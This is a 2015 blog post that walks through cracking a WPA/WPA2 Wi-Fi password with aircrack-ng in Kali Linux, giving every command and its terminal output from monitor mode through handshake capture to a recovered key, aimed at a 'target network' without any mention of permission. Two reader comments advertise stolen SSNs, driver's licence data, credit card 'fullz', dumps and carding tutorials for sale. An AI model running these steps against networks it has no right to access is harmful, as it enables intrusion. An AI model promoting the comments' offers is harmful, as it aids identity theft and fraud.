Monday, 22 June 2015

Hack WPA/WPA2 Wi-Fi with aircrack-ng in Kali Linux.


In this tutorial, we use 'aircrack-ng' in Kali Linux to crack a WPA wifi network. 

Perform the following steps on the Kali Linux machine.

1) Disconnect from all wireless networks.

2) Verify that your wireless card supports monitor mode.
root@kali:~# airmon-ng

Interface    Chipset        Driver

wlan0        Atheros AR9285    ath9k - [phy0]

If your wireless card is not listed above, then it does not support monitor mode and you cannot continue. 

3) Enable Monitor mode
root@kali:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID    Name
2550    NetworkManager
2658    wpa_supplicant


Interface    Chipset        Driver

wlan0        Atheros AR9285    ath9k - [phy0]
                (monitor mode enabled on mon0)

Note the name of the new monitor interface, mon0

4) Disable wireless card from connecting to the internet, allowing it to focus on monitor mode instead.
root@kali:~# ifconfig wlan0 down

5) List all the wireless networks in range.
root@kali:~# airodump-ng mon0
                                                                                                                                                     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                   
 54:B8:0A:89:76:4E  -33       16       10    4   1  54e  WPA  TKIP   PSK SHABBIR                                                                  
 94:D7:23:0C:09:20  -77       20       51    0  11  54e  WPA  CCMP   PSK  MTNL                                                                     
 9C:D6:43:CC:04:B8  -80       11        0    0   2  54e. WPA2 CCMP   PSK  dlink                                                                    
 10:7B:EF:A6:26:80  -80        3        0    0  11  54e  WPA2 CCMP   PSK  TATA                                                                     

Locate your network. Press Ctrl+C to stop the process. And note down the BSSID and CH (channel).


6) Monitor only the target network and wait for a device to connect to the network and then capture the four-way handshake.
root@kali:~# airodump-ng -c 1 --bssid 54:B8:0A:89:76:4E -w Desktop/wpa mon0

Where,
-c 1 -> channel of network is 1 (as seen in the previous output)
--bssid 54:B8:0A:89:76:4E -> BSSID copied from the previous output (The MAC address of the Access Point).
-w Desktop/wpa -> file name where the handshake will be saved.
mon0 -> the monitor interface


7) What we are really doing now is waiting for a device to connect to the network, so that we can capture the four-way handshake which we need in order to crack the password. Also, four files will show up on your desktop. This is where the handshake will be saved.

When a device connects to the network, the following message appears on the airodump screen "WPA handshake:  54:B8:0A:89:76:4E" as shown below:                                     

 CH  1 ][ Elapsed: 32 s ][ 2015-06-22 09:56 ][ WPA handshake: 54:B8:0A:89:76:4E                                        
                                                                                                                                                    
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                    
 54:B8:0A:89:76:4E  -29   1      314        6    0   1  54e  WPA  TKIP   PSK  SHABBIR                                                               
                                                                                                                                                    
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                          
                                                                                                                                                    
 54:B8:0A:89:76:4E  0C:EE:E6:C0:37:43  -26    1e-54      0        9                                                       


The handshake has been captured. Press Ctrl+C on the airodump terminal to stop monitoring the network.

8) Launch the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist  that you have selected.
root@kali:~# aircrack-ng -a2 -b 54:B8:0A:89:76:4E -w /usr/share/wordlists/fern-wifi/common.txt Desktop/*.cap

Opening Desktop/wpa-04.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 beta3


                   [00:00:00] 4 keys tested (254.57 k/s)


                         KEY FOUND! [ goodadmin ]


      Master Key     : 9A CD 12 5D 29 22 11 C7 6A 3D 75 0D 9D A7 76 C1
                       F1 2A 9B 9A 57 DD A9 EA 11 26 B0 EB 40 09 1E EB

      Transient Key  : 5A 15 F5 AD 5A F6 1F 00 78 F5 5F 0F 87 46 8C 81
                       DA 1F B4 8B 7C B2 C9 24 4B 63 6D EF 64 88 30 67
                       66 E4 5E 30 5E 4C C1 E1 F5 47 8A 7F AE F0 A6 FB
                       BF 7B 9E A6 AB ED B6 1B 43 15 43 D1 EF 6E C2 49

      EAPOL HMAC     : 79 56 57 C1 85 7D D8 A4 CD 89 B3 34 A5 36 D0 77


Where,
-a is the method used to crack the handshake. 2=WPA method
-b is the BSSID of the target access point
-w is the path to  the wordlist
Desktop/*.cap is the path to the .cap file captured in the handshake.


9) After completing the hack, disable mon0, and  enable wlan0 to be able to connect to the Internet.

root@kali:~# ifconfig mon0 down
root@kali:~# ifconfig wlan0 up





 

2 comments:

  1. Hey Guys !

    USA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information.

    **DETAILS IN LEADS**
    First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term Business
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  2. Hi Guy's

    Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

    >>1$ each SSN+DOB
    >>3$ each with SSN+DOB+DL
    >>5$ each for premium fullz (700+ credit score with replacement guarantee)

    Prices are negotiable in bulk order
    Serious buyer contact me no time wasters please
    Bulk order will be preferable

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    OTHER STUFF YOU CAN GET

    SSN+DOB Fullz
    CC's with CVV's (vbv & non-vbv)
    USA Photo ID'S (Front & back)

    All type of tutorials available
    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SMTP Linux Root
    DUMPS with pins track 1 and 2
    WU & Bank transfers
    Socks, rdp's, vpn
    Php mailer
    Sql injector
    Bitcoin cracker
    Server I.P's
    HQ Emails with passwords
    All types of tools & tutorials.. & much more

    Looking for long term business
    For trust full vendor, feel free to contact

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    ReplyDelete